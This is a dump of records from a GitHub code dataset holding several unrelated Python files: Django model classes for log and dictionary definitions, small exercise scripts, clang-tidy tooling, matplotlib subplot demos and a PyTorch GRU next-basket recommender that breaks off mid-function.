config(self):\n _r = {}\n field_config = self.get_default_config()\n try:\n _r = json.loads(self._config)\n for k in sorted(_r.keys(), reverse=True):\n field_config[k].update(_r.get(k, {}))\n except:\n pass\n _r = field_config\n\n return _r\n\n @config.setter\n def config(self, obj_value):\n if isinstance(obj_value, dict):\n obj_value = json.dumps(obj_value)\n self._config = obj_value\n\n @CacheAttribute\n def json_config(self):\n\n return json_dumps(self.config)\n\n @property\n def table_name(self):\n return 'log_%s' % self.key.strip()\n\n def save(self, *args, **kwargs):\n return super(LogDefine, self).save(*args, **kwargs)\n\n def __unicode__(self):\n return '%s' % self.key\n\n class Meta:\n pass\n\n\nclass DictBaseType(object):\n \"\"\"基本字典类型\n \"\"\"\n NAME = '字典'\n DEFAULT_JSON = '{}'\n\n def __init__(self, dict_config):\n self.dict = dict_config\n\n def get_dict(self):\n return self.dict\n\n\nclass DBDictType(DictBaseType):\n \"\"\"数据表\n \"\"\"\n NAME = '数据表'\n DEFAULT_JSON = '{\"db\":\"\",\"table_name\":\"\",\"key_name\":\"\",\"show_name\":\"\",\"sql\":\"\"}'\n\n def get_dict(self):\n from analysis.models import QueryServer\n db = self.dict.get('db', '')\n if db:\n the_server = QueryServer.objects.using('read').filter(name=db).first()\n if the_server:\n the_conn = the_server.mysql_conn(True)\n the_conn.autocommit(1)\n\n else:\n the_conn = connections[db]\n else:\n the_conn = connections['read']\n\n _r = {}\n sql = self.dict.get('sql', '')\n if not sql:\n sql = 'SELECT DISTINCT `{key_name}` a,`{show_name}` b FROM {table_name} LIMIT 10000;'\n sql = sql.format(**self.dict)\n cur = the_conn.cursor()\n cur.execute(sql)\n for row in cur.fetchall():\n _r[str(row[0])] = row[1]\n return _r\n\n\nROOT_PATH = settings.BASE_DIR\n\n\nclass UrlDictType(DictBaseType):\n \"\"\"从url请求地址获取\n \"\"\"\n NAME = 'URL'\n DEFAULT_JSON = '{\"url\":\"\",\"method\":\"get\",\"key_name\":\"\",\"show_name\":\"\"}'\n\n def get_dict(self):\n _r = {}\n url = self.dict.get('url')\n try:\n if url:\n rsp = requests.request(self.dict.get('method'))\n _r = rsp.json()\n except Exception as e:\n traceback.print_exc()\n return _r\n\n\nclass FileDictType(DictBaseType):\n \"\"\"从文件内拿json\n \"\"\"\n NAME = '文件'\n DEFAULT_JSON = '{\"file_path\":\"\",\"key_name\":\"\",\"show_name\":\"\"}'\n\n def get_dict(self):\n _r = {}\n the_file_path = os.path.join(ROOT_PATH, self.dict['file_path'])\n try:\n with open(the_file_path, 'rb') as fp:\n _r = the_dict_data = json.loads(fp.read())\n except:\n pass\n return _r\n\n\nfrom framework.utils import get_files_from_dir\n\n\nclass DirDictType(DictBaseType):\n \"\"\"目录里拿字典\n \"\"\"\n NAME = '目录'\n DEFAULT_JSON = '{\"dir_path\":\"\",\"key_name\":\"\",\"show_name\":\"\"}'\n\n def get_dict(self):\n _r = {}\n the_dir_path = os.path.join(ROOT_PATH, self.dict['dir_path'])\n\n try:\n if os.path.isdir(the_dir_path):\n for the_json_file in get_files_from_dir(the_dir_path, '.json'):\n\n with open(the_json_file, 'rb') as fp:\n json_str = fp.read()\n json_data = json.loads(json_str)\n key_name = self.dict.get('key_name', '')\n show_name = self.dict.get('show_name', '')\n if key_name and show_name:\n key = json_data.get(key_name, '')\n value = json_data.get(show_name, '')\n if key:\n _r[key] = value\n except:\n print(the_dir_path)\n traceback.print_exc()\n return _r\n\n\nclass DictDefine(BaseModel):\n \"\"\"字典定义\n \"\"\"\n TYPE_DICT = {0: DictBaseType,\n 1: DBDictType,\n 2: FileDictType,\n 3: DirDictType,\n 4: UrlDictType\n }\n\n SELECT_CHOICES = [(k, v.NAME, v.DEFAULT_JSON) for k, v in 
TYPE_DICT.items()]\n _TYPE_CHOICES = ((k, v.NAME) for k, v in TYPE_DICT.items())\n\n name = models.CharField('字典名', max_length=100, blank=False)\n key = models.CharField('标识名', max_length=50, unique=True, db_index=True, validators=[LetterValidator])\n json_dict = JSONField('存键值', default='{}', null=False, blank=True)\n group = models.CharField('组', max_length=50, default=\"\", blank=True)\n type = models.IntegerField('字典的类型', default=0, choices=_TYPE_CHOICES)\n remark = models.CharField('备注', max_length=400, default='', blank=True)\n\n __cache_dict = {}\n\n def __unicode__(self):\n return '%s' % self.name\n\n class Meta:\n pass\n\n @property\n def dict(self):\n try:\n _d = json.loads(self.json_dict)\n except:\n _d = {}\n return _d\n\n @dict.setter\n def dict(self, obj_value):\n # for k, v in obj_value.items():\n # obj_value[k] = v.encode('utf-8')\n _data = json.dumps(obj_value)\n self.json_dict = _data\n\n @classmethod\n def get_dict_for_key(cls, key_name, reverse=False):\n _r = {}\n try:\n if '{' in key_name:\n _r = json.loads(key_name)\n else:\n dict_model = cls.objects.get(key=key_name)\n _r = dict_model.get_dict()\n if reverse:\n _r = cls.reverse_dict(_r)\n except:\n pass\n return _r\n\n @staticmethod\n def reverse_dict(_dict):\n \"\"\"反转字典\n \"\"\"\n return dict((v, k) for k, v in _dict.items())\n\n def get_dict(self):\n \"\"\"获取字典\n \"\"\"\n _r = {}\n if self.__cache_dict: return self.__cache_dict\n type_class = self.TYPE_DICT.get(self.type)\n try:\n dict_handler_obj = type_class(self.dict)\n _r = dict_handler_obj.get_dict()\n except:\n traceback.print_exc()\n self.__cache_dict = _r\n return self.__cache_dict\n\n def get_json_data(self):\n return self.json_dict\n\n @classmethod\n def get_group(cls):\n \"\"\"获取字典的分组\n \"\"\"\n groups = [g for g in cls.objects.using('read').values_list('group', flat=True).distinct() if g]\n return groups\n","repo_name":"xzregg/djmyframework","sub_path":"djmyframework/apps/log_def/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":12171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33447787401","text":"smax = int(input())\ntoeschouwers = input()\nstaand = 0\nvrienden = 0\n\nfor s in range (0,smax+1):\n # print('Checking s: '+str(s))\n while True:\n comp = staand+vrienden\n # print('Comparing s = '+str(s)+' with staand+vrienden = '+str(comp))\n if s <= comp:\n # print('s <= comp')\n staand = staand + int(toeschouwers[s])\n break\n else:\n# print('s > comp')\n vrienden += 1\n\n\n#print('Final output: ')\nprint(str(vrienden))","repo_name":"mshessey/WISB256","sub_path":"Oefenopgaven/StaandeOvatie.py","file_name":"StaandeOvatie.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20371969085","text":"try:\n res = 100 / 0\n# except(ошибок) может быть много\nexcept ZeroDivisionError:\n print('O!')\n# else выполняется когда все хорошо, else можно использовать для явного вывода - все хорошо\nelse:\n print(f'Res = {round(res, 2)}')\n# finally выполняется по любому, независимо от того пошло все хорошо или плохо\nfinally:\n print('Game over')","repo_name":"Djam290580/lesson_6","sub_path":"lesson_8/practic_8.5.except.py","file_name":"practic_8.5.except.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38126512468","text":"from MiniMaxSearch import MiniMaxSearch\nfrom Rushour 
import Rushhour\nfrom State import State\n\n\ndef test_print_move():\n rh = Rushhour([True], [2], [2], [\"rouge\"])\n s = State([0])\n s = s.put_rock((3,1)) # Roche dans la case 3-1\n s = s.move(0, 1) # Voiture rouge vers la droite\n\n algo = MiniMaxSearch(rh, s, 1)\n algo.print_move(True, s)\n algo.print_move(False, s)\n\ntest_print_move()","repo_name":"olivierND/INF8215","sub_path":"TP2/tests/test_print_move.py","file_name":"test_print_move.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5241079457","text":"# -*- coding: utf-8 -*-\n\nfrom openfisca_core.entities import build_entity\n\nFamille = build_entity(\n key = \"famille\",\n plural = \"familles\",\n label = u'Famille',\n roles = [\n {\n 'key': 'parent',\n 'plural': 'parents',\n 'label': u'Parents',\n 'subroles': ['demandeur', 'conjoint']\n },\n {\n 'key': 'enfant',\n 'plural': 'enfants',\n 'label': u'Enfants',\n }\n ]\n )\n\n\nIndividu = build_entity(\n key = \"individu\",\n plural = \"individus\",\n label = u'Individu',\n is_person = True,\n )\n\nentities = [Individu, Famille]\n","repo_name":"openfisca/openfisca-dummy-country","sub_path":"openfisca_dummy_country/entities.py","file_name":"entities.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"69938094634","text":"class Car:\n def __init__(self, man: str, mod: str, col: str, year, fuel_consumption, tank_capacity):\n self.manufacterer = man\n self.model = mod\n self.color = col\n self.year = year\n self.fuel_consumption = fuel_consumption\n self.tank_capacity = tank_capacity\n self.km = 0\n self.fuel = 0\n def __str__(self):\n return f\"{self.manufacterer}, {self.model}, {self.color}\"\n\n def fill_tank(self, liters: int):\n if 0 < liters <= self.tank_capacity - self.fuel:\n self.fuel += liters\n return True\n return False\n\n def drive(self, km):\n if km > 0 and self.fuel * (100/self.fuel_consumption) >= km:\n self.km += km\n self.fuel -= (self.fuel_consumption/100) * km\n return True\n return False","repo_name":"HassanKhCode/Practicing","sub_path":"12-12-2022/Car.py","file_name":"Car.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40812262269","text":"import sys\nimport os\nimport argparse\nimport subprocess\nfrom termcolor import cprint\n\nfrom setup_clang_tidy import setup_clang_tidy\nfrom parse_clang_tidy_res import warn_txt_parse, INFO, ERROR\n\n\ndef run_clang_tidy(prj_dir: str, verbose: bool, clang_tidy_cfg_dir: str):\n \"\"\"\n Run clang-tidy through the ESP IDF clang-check command.\n\n Parameters\n ----------\n prj_dir : str\n ESP IDF project directory configured for clang-check. 
Should be one of the examples in this\n        repository.\n    verbose : bool\n        When true, stream to the STDOUT the output of all the commands, hide them otherwise.\n    clang_tidy_cfg_dir : str\n        Absolute path to the .clang-tidy configuration file to pass to clang-tidy.\n    \"\"\"\n    cprint(\"Running the checker.\", color=INFO, flush=True)\n\n    run_clang_tidy_py_args = f\"-config-file={clang_tidy_cfg_dir}\"\n    cmds = [\n        'export PATH=\"$PWD:$PATH\"',\n        \" \".join(\n            [\n                \"idf.py\",\n                \"clang-check\",\n                \"--run-clang-tidy-options\",\n                f'\"{run_clang_tidy_py_args}\"',\n                \"--include-paths $PWD/../..\",\n            ]\n        ),\n    ]\n    ret = subprocess.run(\n        \"&&\".join(cmds),\n        capture_output=not verbose,\n        shell=True,\n        cwd=prj_dir,\n        check=False,\n    )\n    if ret.returncode:\n        cprint(\"Failure in running the checker.\", color=ERROR, flush=True)\n        print(ret.stderr, flush=True)\n        print(ret.stdout, flush=True)\n        sys.exit(1)\n\n    # Check if resulting report is not empty.\n    with open(os.path.join(prj_dir, \"warnings.txt\"), encoding=\"utf-8\") as warnings_txt_fp:\n        if len(warnings_txt_fp.readlines()) < 2:\n            cprint(\"Clang tidy did not generate the correct output.\", color=ERROR, flush=True)\n            sys.exit(1)\n\n\n# When running as a standalone script\nif __name__ == \"__main__\":\n    # Command line arguments are often duplicated.\n    # pylint: disable=duplicate-code\n\n    # Parse command line arguments\n    DESCRIPTION = (\n        \"Utility for running ESP IDF clang-check and analyzing the result. \"\n        r\"The export.sh\\export.bat\\export.fish script should be run before this script. \"\n        \"The default values of --project-dir and --clang-tidy-dir assume you are running this\"\n        \" script from the main folder in this repository.\"\n    )\n    parser = argparse.ArgumentParser(description=DESCRIPTION)\n    parser.add_argument(\n        \"-p\",\n        \"--project-dir\",\n        dest=\"prj_dir\",\n        default=os.path.join(os.getcwd(), \"examples\", \"datastreams\"),\n        help=(\n            \"ESP IDF project directory in which clang-check should be run. \"\n            \"Defaults to the datastreams example folder.\"\n        ),\n    )\n    parser.add_argument(\n        \"-c\",\n        \"--clang-tidy-dir\",\n        dest=\"clang_tidy_cfg_dir\",\n        default=os.path.join(os.getcwd(), \".clang-tidy\"),\n        help=\"The absolute path to the .clang-tidy configuration file.\",\n    )\n    parser.add_argument(\n        \"-a\",\n        \"--also_install\",\n        dest=\"also_install\",\n        action=\"store_true\",\n        help=\"Setup clang-tidy before running it.\",\n    )\n    parser.add_argument(\n        \"-n\",\n        \"--no-run\",\n        dest=\"no_run\",\n        action=\"store_true\",\n        help=\"When set, do not run. Use the result of the last run.\",\n    )\n    parser.add_argument(\n        \"-t\",\n        \"--trim\",\n        dest=\"trim\",\n        action=\"store_true\",\n        help=\"When set, trim the report printed to stdout.\",\n    )\n    parser.add_argument(\n        \"-v\",\n        \"--verbose\",\n        dest=\"verbose\",\n        action=\"store_true\",\n        help=\"When set, print more information to the stdout.\",\n    )\n    parser.add_argument(\n        \"-r\",\n        \"--remove-clang-diag\",\n        dest=\"remove_clang_diag\",\n        action=\"store_true\",\n        help=\"Remove warnings and errors generated by the clang compiler diagnostic.\",\n    )\n    parser.add_argument(\n        \"-f\",\n        \"--filter\",\n        dest=\"code_filter\",\n        default=r\".*\",\n        help=\"A regex used for filtering the clang-tidy error codes. Defaults to '.*'.\",\n    )\n\n    args = parser.parse_args()\n\n    if args.also_install and not args.no_run:\n        setup_clang_tidy(args.prj_dir, args.verbose)\n    else:\n        cprint(\"Skipping the environment configuration.\", color=INFO, flush=True)\n\n    if not args.no_run:\n        run_clang_tidy(args.prj_dir, args.verbose, args.clang_tidy_cfg_dir)\n    else:\n        cprint(\"Using an old analysis result.\", color=INFO, flush=True)\n\n    if warn_txt_parse(\n        os.path.join(args.prj_dir, \"warnings.txt\"),\n        args.trim,\n        args.code_filter,\n        args.remove_clang_diag,\n    ):\n        sys.exit(1)\n","repo_name":"astarte-platform/astarte-device-sdk-esp32","sub_path":"python_scripts/run_clang_tidy.py","file_name":"run_clang_tidy.py","file_ext":"py","file_size_in_byte":4729,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"}
{"seq_id":"37040586368","text":"# settings module itself should return local settings so that\n# manage.py commands work.\ntry:\n    from .local import *\nexcept ImportError as e:\n    settings_path = 'voxsnap/settings'\n    error_message = '{mes} (did you copy {path}/local.example.py to {path}/local.py?)'.format(\n        mes=e.args[0], path=settings_path)\n    e.args = tuple([error_message])\n\n    raise e\n","repo_name":"ngx-devman/Voxsnap","sub_path":"voxsnap/settings/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"1435060330","text":"import sys\nfrom bisect import *\nfrom collections import *\ninput = lambda : sys.stdin.readline().strip()\nintput = lambda : map(int, input().split())\nenum = enumerate\ndfd = defaultdict\n\ndef solve():\n    N, = intput()\n    A = Counter( intput() )\n    ans = t = 0\n    for x,c in A.items():\n        ans += c % 2\n        t += c + c % 2\n    return ans + t%4\n\nif __name__ == '__main__':\n    T, = intput()\n    for _ in range(T):\n        print( solve() )\n","repo_name":"henryliuser/hliu-cp","sub_path":"codechef/L0/recsti.py","file_name":"recsti.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"}
{"seq_id":"39567674675","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jan 10 16:51:09 2019\n\n@author: natasha_yang\n\n@e-mail: ityangna0402@163.com\n\"\"\"\n\nimport matplotlib.pyplot as plt\n\nplt.figure()\nplt.subplot(2, 2, 1)#2*2个中的第一个\nplt.plot([0, 1], [0, 1])\n\nplt.subplot(2, 2, 2)\nplt.plot([0, 1], [0, 2])\n\nplt.subplot(223)\nplt.plot([0, 1], [0, 3])\n\nplt.subplot(224)\nplt.plot([0, 1], [0, 4])\nplt.show()\n\n#不均匀图中图\nplt.figure()\nplt.subplot(2, 1, 1)#第一行\nplt.plot([0, 1], [0, 1])\n\nplt.subplot(2, 3, 4)#第二行,第一行3个,所以第二行开始的是编号4\nplt.plot([0, 1], [0, 2])\n\nplt.subplot(235)\nplt.plot([0, 1], [0, 3])\n\nplt.subplot(236)\nplt.plot([0, 1], [0, 4])\nplt.show()\n\n#分格显示\n####subplot2grid\nplt.figure()\n#(3,3)表示将整个图像窗口分成3行3列,(0,0)表示从第0行第0列开始作图,colspan=3表示列的跨度为3,rowspan=1表示行的跨度为1\n#---\nax1 = plt.subplot2grid((3, 3), (0, 0), colspan=3)\nax1.plot([1, 2], [1, 2])\nax1.set_title('ax1_title')\n\n#从第1行第0列开始作图\n#---\n# -\nax2 = plt.subplot2grid((3, 3), (1, 0), colspan=2)\nax3 = plt.subplot2grid((3, 3), (1, 2), rowspan=2)\n#--\nax4 = plt.subplot2grid((3, 3), (2, 0))\nax5 = plt.subplot2grid((3, 3), (2, 1))\n#ax4.scatter创建一个散点图,使用ax4.set_xlabel和ax4.set_ylabel来对x轴和y轴命名\nax4.scatter([1, 2], [2, 2])\nax4.set_xlabel('ax4_x')\nax4.set_ylabel('ax4_y')\nplt.show()\n\n####gridspec\nimport matplotlib.gridspec as gridspec\n#gridspec.GridSpec将整个图像窗口分成3行3列\nplt.figure()\ngs = 
gridspec.GridSpec(3, 3)\n#---\nax6 = plt.subplot(gs[0, :])\n#---\n# -\nax7 = plt.subplot(gs[1, :2])\nax8 = plt.subplot(gs[1:, 2])\n#--\nax9 = plt.subplot(gs[-1, 0])\nax10 = plt.subplot(gs[-1, -2])\nplt.show()\n\n####subplots\n#2行2列的图像窗口,sharex=True共享x轴坐标,sharey=True共享y轴坐标\nf, ((ax11, ax12), (ax13, ax14)) = plt.subplots(2, 2, sharex=True, sharey=True)\n#ax11.scatter创建一个散点图\nax11.scatter([1, 2], [1, 2])\n#紧凑显示图像\nplt.tight_layout()\nplt.show()","repo_name":"yangnaGitHub/LearningProcess","sub_path":"display/matplotlib_07.py","file_name":"matplotlib_07.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25481460086","text":"import numpy as np\nimport random\nimport sys\nimport os\nimport json\nfrom tqdm import tqdm\n\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom torch import optim\nimport torch.nn.functional as F\n\nnum_iter = 20 #epoch number\nhidden_size = 32\nnum_layers = 1\n\n# only one can be set 1\nuse_embedding = 1\nuse_linear_reduction = 0\n\natten_decoder = 1\nuse_dropout = 0\nuse_average_embedding = 1\n\nlabmda = 10\n\nMAX_LENGTH = 100\nlearning_rate = 0.001\nprint_val = 3000\nuse_cuda = torch.cuda.is_available()\n\n\nclass EncoderRNN_new(nn.Module):\n def __init__(self, input_size, hidden_size, num_layers):\n super(EncoderRNN_new, self).__init__()\n self.input_size = input_size\n self.hidden_size = hidden_size\n self.reduction = nn.Linear(input_size, hidden_size)\n self.embedding = nn.Embedding(input_size, hidden_size)\n self.time_embedding = nn.Embedding(input_size, hidden_size)\n self.time_weight = nn.Linear(input_size, input_size)\n if use_embedding or use_linear_reduction:\n self.gru = nn.GRU(hidden_size, hidden_size, num_layers)\n else:\n self.gru = nn.GRU(input_size, hidden_size, num_layers)\n\n def forward(self, input, hidden):\n if use_embedding:\n list = Variable(torch.LongTensor(input).view(-1, 1))\n if use_cuda:\n list = list.cuda()\n average_embedding = Variable(torch.zeros(hidden_size)).view(1, 1, -1)\n vectorized_input = Variable(torch.zeros(self.input_size)).view(-1)\n if use_cuda:\n average_embedding = average_embedding.cuda()\n vectorized_input = vectorized_input.cuda()\n\n for ele in list:\n embedded = self.embedding(ele).view(1, 1, -1)\n tmp = average_embedding.clone()\n average_embedding = tmp + embedded\n vectorized_input[ele] = 1\n\n if use_average_embedding:\n tmp = [1] * hidden_size\n length = Variable(torch.FloatTensor(tmp))\n if use_cuda:\n length = length.cuda()\n # for idx in range(hidden_size):\n real_ave = average_embedding.view(-1) / length\n average_embedding = real_ave.view(1, 1, -1)\n\n embedding = average_embedding\n else:\n tensorized_input = torch.from_numpy(input).clone().type(torch.FloatTensor)\n inputs = Variable(torch.unsqueeze(tensorized_input, 0).view(1, -1))\n if use_cuda:\n inputs = inputs.cuda()\n if use_linear_reduction == 1:\n reduced_input = self.reduction(inputs)\n else:\n reduced_input = inputs\n\n embedding = torch.unsqueeze(reduced_input, 0)\n\n output, hidden = self.gru(embedding, hidden)\n return output, hidden\n\n def initHidden(self):\n result = Variable(torch.zeros(num_layers, 1, self.hidden_size))\n if use_cuda:\n return result.cuda()\n else:\n return result\n\n\nclass AttnDecoderRNN_new(nn.Module):\n def __init__(self, hidden_size, output_size, num_layers, dropout_p=0.2, max_length=MAX_LENGTH):\n super(AttnDecoderRNN_new, self).__init__()\n self.hidden_size = hidden_size\n 
self.output_size = output_size\n self.dropout_p = dropout_p\n self.max_length = max_length\n\n self.embedding = nn.Embedding(self.output_size, self.hidden_size)\n if use_embedding or use_linear_reduction:\n self.attn = nn.Linear(self.hidden_size * 2, self.max_length)\n self.attn1 = nn.Linear(self.hidden_size + output_size, self.hidden_size)\n else:\n self.attn = nn.Linear(self.hidden_size + self.output_size, self.output_size)\n\n if use_embedding or use_linear_reduction:\n self.attn_combine = nn.Linear(self.hidden_size * 2, self.hidden_size)\n self.attn_combine3 = nn.Linear(self.hidden_size * 2 + output_size, self.hidden_size)\n else:\n self.attn_combine = nn.Linear(self.hidden_size + self.output_size, self.hidden_size)\n self.attn_combine5 = nn.Linear(self.output_size, self.output_size)\n self.dropout = nn.Dropout(self.dropout_p)\n self.reduction = nn.Linear(self.output_size, self.hidden_size)\n if use_embedding or use_linear_reduction:\n self.gru = nn.GRU(hidden_size, hidden_size, num_layers)\n else:\n self.gru = nn.GRU(hidden_size, hidden_size, num_layers)\n self.out = nn.Linear(self.hidden_size, self.output_size)\n\n def forward(self, input, hidden, encoder_outputs, history_record, last_hidden):\n if use_embedding:\n list = Variable(torch.LongTensor(input).view(-1, 1))\n if use_cuda:\n list = list.cuda()\n average_embedding = Variable(torch.zeros(hidden_size)).view(1, 1, -1)\n if use_cuda:\n average_embedding = average_embedding.cuda()\n\n for ele in list:\n embedded = self.embedding(ele).view(1, 1, -1)\n tmp = average_embedding.clone()\n average_embedding = tmp + embedded\n\n if use_average_embedding:\n tmp = [1] * hidden_size\n length = Variable(torch.FloatTensor(tmp))\n if use_cuda:\n length = length.cuda()\n # for idx in range(hidden_size):\n real_ave = average_embedding.view(-1) / length\n average_embedding = real_ave.view(1, 1, -1)\n\n embedding = average_embedding\n else:\n tensorized_input = torch.from_numpy(input).clone().type(torch.FloatTensor)\n inputs = Variable(torch.unsqueeze(tensorized_input, 0).view(1, -1))\n if use_cuda:\n inputs = inputs.cuda()\n if use_linear_reduction == 1:\n reduced_input = self.reduction(inputs)\n else:\n reduced_input = inputs\n\n embedding = torch.unsqueeze(reduced_input, 0)\n\n if use_dropout:\n droped_ave_embedded = self.dropout(embedding)\n else:\n droped_ave_embedded = embedding\n\n history_context = Variable(torch.FloatTensor(history_record).view(1, -1))\n if use_cuda:\n history_context = history_context.cuda()\n\n attn_weights = F.softmax(\n self.attn(torch.cat((droped_ave_embedded[0], hidden[0]), 1)), dim=1)\n attn_applied = torch.bmm(attn_weights.unsqueeze(0),\n encoder_outputs.unsqueeze(0))\n\n element_attn_weights = F.softmax(\n self.attn1(torch.cat((history_context, hidden[0]), 1)), dim=1)\n\n output = torch.cat((droped_ave_embedded[0], attn_applied[0]), 1)\n output = self.attn_combine(output).unsqueeze(0)\n\n output = F.relu(output)\n output, hidden = self.gru(output, hidden)\n\n linear_output = self.out(output[0])\n\n value = torch.sigmoid(self.attn_combine5(history_context).unsqueeze(0))\n\n one_vec = Variable(torch.ones(self.output_size).view(1, -1))\n if use_cuda:\n one_vec = one_vec.cuda()\n\n res = history_context.clone()\n res[history_context != 0] = 1\n # Linear后,要mask掉其他位置的,value为weight,gru的output需要减去weight,再weight*history_context.\n output = F.softmax(linear_output * (one_vec - res * value[0]) + history_context * value[0], dim=1)\n\n return output.view(1, -1), hidden, attn_weights\n\n def initHidden(self):\n result = 
Variable(torch.zeros(num_layers, 1, self.hidden_size))\n if use_cuda:\n return result.cuda()\n else:\n return result\n\n\nclass custom_MultiLabelLoss_torch(nn.modules.loss._Loss):\n def __init__(self):\n super(custom_MultiLabelLoss_torch, self).__init__()\n\n def forward(self, pred, target, weights):\n #balance the mseloss, incase that some items occurs frequently in the training dataset\n mseloss = torch.sum(weights * torch.pow((pred - target), 2))\n pred = pred.data\n target = target.data\n\n ones_idx_set = (target == 1).nonzero()\n zeros_idx_set = (target == 0).nonzero()\n\n ones_set = torch.index_select(pred, 1, ones_idx_set[:, 1])\n zeros_set = torch.index_select(pred, 1, zeros_idx_set[:, 1])\n\n repeat_ones = ones_set.repeat(1, zeros_set.shape[1])\n repeat_zeros_set = torch.transpose(zeros_set.repeat(ones_set.shape[1], 1), 0, 1).clone()\n repeat_zeros = repeat_zeros_set.reshape(1, -1)\n difference_val = -(repeat_ones - repeat_zeros)\n exp_val = torch.exp(difference_val)\n exp_loss = torch.sum(exp_val)\n normalized_loss = exp_loss / (zeros_set.shape[1] * ones_set.shape[1])\n set_loss = Variable(torch.FloatTensor([labmda * normalized_loss]), requires_grad=True)\n if use_cuda:\n set_loss = set_loss.cuda()\n loss = mseloss + set_loss\n\n return loss\n\ndef train(input_variable, target_variable, encoder, decoder, codes_inverse_freq, encoder_optimizer, decoder_optimizer,\n criterion, output_size, max_length=MAX_LENGTH):\n encoder_hidden = encoder.initHidden()\n\n encoder_optimizer.zero_grad()\n decoder_optimizer.zero_grad()\n\n input_length = len(input_variable)\n target_length = len(target_variable)\n\n encoder_outputs = Variable(torch.zeros(max_length, encoder.hidden_size))\n if use_cuda:\n encoder_outputs = encoder_outputs.cuda()\n\n history_record = np.zeros(output_size)\n for ei in range(input_length - 1):\n if ei == 0: #because first basket in input variable is [-1]\n continue\n for ele in input_variable[ei]:\n history_record[ele] += 1.0 / (input_length - 2)\n\n for ei in range(input_length - 1):\n if ei == 0:\n continue\n encoder_output, encoder_hidden = encoder(input_variable[ei], encoder_hidden)\n encoder_outputs[ei - 1] = encoder_output[0][0]\n\n last_input = input_variable[input_length - 2]\n decoder_hidden = encoder_hidden\n last_hidden = encoder_hidden\n decoder_input = last_input\n\n decoder_output, decoder_hidden, decoder_attention = decoder(\n decoder_input, decoder_hidden, encoder_outputs, history_record, last_hidden)\n\n #create target tensor.\n vectorized_target = np.zeros(output_size)\n for idx in target_variable[1]:\n vectorized_target[idx] = 1\n target = Variable(torch.FloatTensor(vectorized_target).reshape(1, -1))\n\n if use_cuda:\n target = target.cuda()\n weights = Variable(torch.FloatTensor(codes_inverse_freq).reshape(1, -1))\n if use_cuda:\n weights = weights.cuda()\n\n loss = criterion(decoder_output, target, weights)\n loss.backward()\n\n encoder_optimizer.step()\n decoder_optimizer.step()\n\n return loss.item()\n\n\n######################################################################\n# This is a helper function to print time elapsed and estimated time\n# remaining given the current time and progress %.\n\nimport time\nimport math\n\ndef asMinutes(s):\n m = math.floor(s / 60)\n s -= m * 60\n return '%dm %ds' % (m, s)\n\ndef timeSince(since, percent):\n now = time.time()\n s = now - since\n es = s / (percent)\n rs = es - s\n return '%s (- %s)' % (asMinutes(s), asMinutes(rs))\n\ndef trainIters(data_history, data_future, output_size, encoder, decoder, 
model_name, training_key_set, val_keyset, codes_inverse_freq, next_k_step,\n n_iters, top_k):\n start = time.time()\n print_loss_total = 0 # Reset every print_every\n # elem_wise_connection.initWeight()\n\n encoder_optimizer = torch.optim.Adam(encoder.parameters(), lr=learning_rate, betas=(0.9, 0.98), eps=1e-11,\n weight_decay=0)\n decoder_optimizer = torch.optim.Adam(decoder.parameters(), lr=learning_rate, betas=(0.9, 0.98), eps=1e-11,\n weight_decay=0)\n\n\n total_iter = 0\n criterion = custom_MultiLabelLoss_torch()\n best_recall = 0.0\n # train n_iters epoch\n for j in range(n_iters):\n # get a suffle list\n key_idx = np.random.permutation(len(training_key_set))\n training_keys = []\n for idx in key_idx:\n training_keys.append(training_key_set[idx])\n\n for iter in tqdm(range(0, len(training_key_set))):\n # get training data and label.\n input_variable = data_history[training_keys[iter]]\n target_variable = data_future[training_keys[iter]]\n\n loss = train(input_variable, target_variable, encoder,\n decoder, codes_inverse_freq, encoder_optimizer, decoder_optimizer, criterion, output_size)\n\n print_loss_total += loss\n total_iter += 1\n\n # print loss and save model\n print_loss_avg = print_loss_total / len(training_key_set)\n print_loss_total = 0\n print('%s (%d %d%%) %.6f' % (timeSince(start, total_iter / (n_iters * len(training_key_set))), total_iter,\n total_iter / (n_iters * len(training_key_set)) * 100, print_loss_avg))\n sys.stdout.flush()\n\n recall, ndcg, hr = evaluate(data_history, data_future, encoder, decoder, output_size, val_keyset, next_k_step,\n top_k)\n if recall>best_recall:\n best_recall=recall\n # print(pred_dict[user])\n filepath = './models/encoder_' + (model_name) + '_model_best'\n torch.save(encoder, filepath)\n filepath = './models/decoder_' + (model_name) + '_model_best'\n torch.save(decoder, filepath)\n print('Recall:', recall)\n print('Finish epoch: ' + str(j))\n print('Model is saved.')\n######################################################################\n# Plotting results\n# ----------------\n#\n# Plotting is done with matplotlib, using the array of loss values\n# ``plot_losses`` saved while training.\n\ncosine_sim = []\npair_cosine_sim = []\n\ndef decoding_next_k_step(encoder, decoder, input_variable, target_variable, output_size, k, activate_codes_num):\n # k is the next k step.\n encoder_hidden = encoder.initHidden()\n\n input_length = len(input_variable)\n encoder_outputs = Variable(torch.zeros(MAX_LENGTH, encoder.hidden_size))\n if use_cuda:\n encoder_outputs = encoder_outputs.cuda()\n\n # history frequency information\n history_record = np.zeros(output_size)\n count = 0.0\n for ei in 